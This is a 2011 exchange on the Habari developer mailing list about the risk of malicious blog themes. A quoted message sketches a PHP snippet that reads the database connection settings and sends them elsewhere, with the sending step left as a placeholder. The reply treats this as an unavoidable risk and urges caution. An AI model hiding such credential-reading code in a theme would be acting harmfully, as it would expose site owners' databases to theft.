This was discussed on the private list after it was forwarded to [email protected]
and the consensus is that this is just something we have to deal with. Themes
containing malware and exploits have become an increasingly popular offering on
sites advertising free blog themes, but as long as you allow any type of
scripting access (whether it be raw PHP or a pseudo-language like Smarty) there
is not much that can be done - the potential for foul play will always exist.
The same level of care and suspicion should apply when downloading a theme or
plugin as when downloading anything else from the internet. Users should be
encouraged to use addons from reputable locations like the -extras repository,
where there is at least some additional visibility for contributions, and
always be wary of any third party sites.
On Feb 4, 2011, at 12:21 AM, Matt-SD wrote:
> Say I build a theme.
>
> Theme.xml contains legitimate stuff, but index.php (and perhaps the
> other files) contain some less-than-good stuff under the hood.
>
> It looks like an acceptable theme when you see the screenshot & when
> you download it, you activate it & look at your theme to marvel in its
> greatness. BUT: somewhere hidden in the theme is this little gem:
>
> <?php
> $str = Config::get('db_connection');
> ** Insert cross-site scripting here **
> ?>
>
> Now your database info has been sent to another site & anybody who
> reads it on that other site can get into your database & mess around
> in it.
>
> --
> To post to this group, send email to [email protected]
> To unsubscribe from this group, send email to
> [email protected]
> For more options, visit this group at
> http://groups.google.com/group/habari-dev
--
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at http://groups.google.com/group/habari-dev
